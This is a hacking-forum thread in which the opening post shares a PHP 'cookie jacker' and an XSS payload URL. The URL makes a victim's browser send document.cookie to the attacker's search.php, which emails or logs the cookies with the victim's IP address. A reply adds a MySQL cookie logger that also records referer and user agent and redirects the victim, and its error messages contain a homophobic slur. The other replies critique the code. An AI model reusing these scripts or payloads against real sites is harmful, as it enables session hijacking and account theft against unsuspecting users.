Login Register






Cookie Jacker - Written in PHP [XSS] filter_list
Author
Message
Cookie Jacker - Written in PHP [XSS] #1
Name the file search.php. This will give the user the effect of a search page, like Google, but when it pops up, it will say 404 or a JavaScript alert saying you stole their cookies. It depends on your settings.

PHP Code:
<?php // Settings // $doNotify = 'no'; // Either yes or no $emailAddr = 'email@addr.ess'; // Your email address $fileName = 'log.txt'; // Name of the file that logs the cookies $EmailOrLog = 'email'; // Log type, email or log // End Settings // $notification = "<script>alert('All your cookie are mine.')</script>"; // Notification to be displayed IF doNotify is set to 'yes' $fakePage = "<html><head><h1>404 File Not Found</h1></head></html>"; // 404 Page if doNotify is set to 'no' if($doNotify != 'yes') {echo $notification;}else{echo $fakePage;} $cookies = htmlspecialchars($_GET["request"]); // Gets user cookies from URL $ipaddr = $_SERVER["REMOTE_ADDR"]; // Gets user IP address $message = "IP Address: ".$ipaddr."\n Cookies: ".$cookies; if($EmailOrLog != 'email') { mail($emailAddr,"Cookies",$message); // Mails cookie hijacker IF EmailOrLog is set to 'email' }elseif($EmailOrLog != 'log'){ $oven = fopen($fileName, "a"); // Logs to file IF EmailOrLog is set to 'log' fwrite($oven,$message); fclose($oven); } ?>

Send the target to
Code:
http://vulnsite.ite/index.php?search=<script>location.href="http://yours.ite/search.php?request="+document.cookie;</script>

Hope you like my script, and if you used it, hope it was effective enough for you.

Warning / Disclaimer: I am not responsible for any legal trouble you get an. This is on your hands. This jacker was made for educational purposes, hence the code was commented.
[Image: BXqGARG.png]

Reply

RE: Cookie Jacker - Written in PHP [XSS] #2
Use boolean logic, none of this string comparison stuff. It's both faster and cleaner.

Look into creating a database, bitches love databases.

Reply

RE: Cookie Jacker - Written in PHP [XSS] #3
These have been done 69 times per hour by every Indonesian defacer in the world, but this is a nice effort.
I'll make one with DB later today, and a lookup page.
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47

Reply

RE: Cookie Jacker - Written in PHP [XSS] #4
(03-28-2014, 06:01 PM)Starfall Wrote: These have been done 69 times per hour by every Indonesian defacer in the world, but this is a nice effort.
I'll make one with DB later today, and a lookup page.

I'm new-ish to PHP, so thanks I suppose.
[Image: BXqGARG.png]

Reply

RE: Cookie Jacker - Written in PHP [XSS] #5
mysql> create table cookie ( id INT PRIMARY KEY AUTO_INCREMENT, ip VARCHAR(16), referer VARCHAR(1000), user_agent VARCHAR(1000), cookie VARCHAR(1000) );


PHP Code:
<?php $redir = "http://google.com"; $sqlhost = "localhost"; $sqluser = "cookie"; $sqlpw = "cookie"; $sqldb = "cookie"; $db = mysql_connect($sqlhost, $sqluser, $sqlpw) or die ("your a faggot"); mysql_select_db($sqldb) or die("your a faggot"); strlen($_GET["c"]) or die("your a faggot"); // C is for Cookie. That's good enough for me. $ip = $_SERVER["REMOTE_ADDR"]; $cookie = mysql_real_escape_string($_GET["c"]); $referer = mysql_real_escape_string($_SERVER["HTTP_REFERER"]); $ua = mysql_real_escape_string($_SERVER["HTTP_USER_AGENT"]); $q = "INSERT INTO cookie(ip,cookie,referer,user_agent) VALUES('$ip', '$cookie', '$referer', '$ua');"; mysql_query($q); header("Location: $redir"); ?>
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47

Reply

RE: Cookie Jacker - Written in PHP [XSS] #6
Why would you want to redirect a successful cookie steal to anything but the referer, minus the exploit string?

Reply

RE: Cookie Jacker - Written in PHP [XSS] #7
(03-29-2014, 07:19 PM)w00t Wrote: Why would you want to redirect a successful cookie steal to anything but the referer, minus the exploit string?

I dunno but I made it an option Tongue
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47

Reply

RE: Cookie Jacker - Written in PHP [XSS] #8
cool thanks op i made one based on ur script

Reply

RE: Cookie Jacker - Written in PHP [XSS] #9
Why not use the existing 404 page if it exists? Also, $HTTP_GET_VARS is deprecated and has been superseded with $_GET. As w00t said though too, for options that only have 2 possibilities, why are you using strings instead of boolean?

Reply

RE: Cookie Jacker - Written in PHP [XSS] #10
(04-13-2014, 06:47 PM)0xDEAD10CC Wrote: Why not use the existing 404 page if it exists? Also, $HTTP_GET_VARS is deprecated and has been superseded with $_GET. As w00t said though too, for options that only have 2 possibilities, why are you using strings instead of boolean?

I know $HTTP_GET_VARS has been deprecated. I wrote this on my computer, which at the time wasn't running version 5. Now I've gone ahead and just removed PHP as a whole. I would've updated this thread, but I'd rather not. #lazy

And I am using strings instead of booleans because meh.

>updated to get
>happy?
[Image: BXqGARG.png]

Reply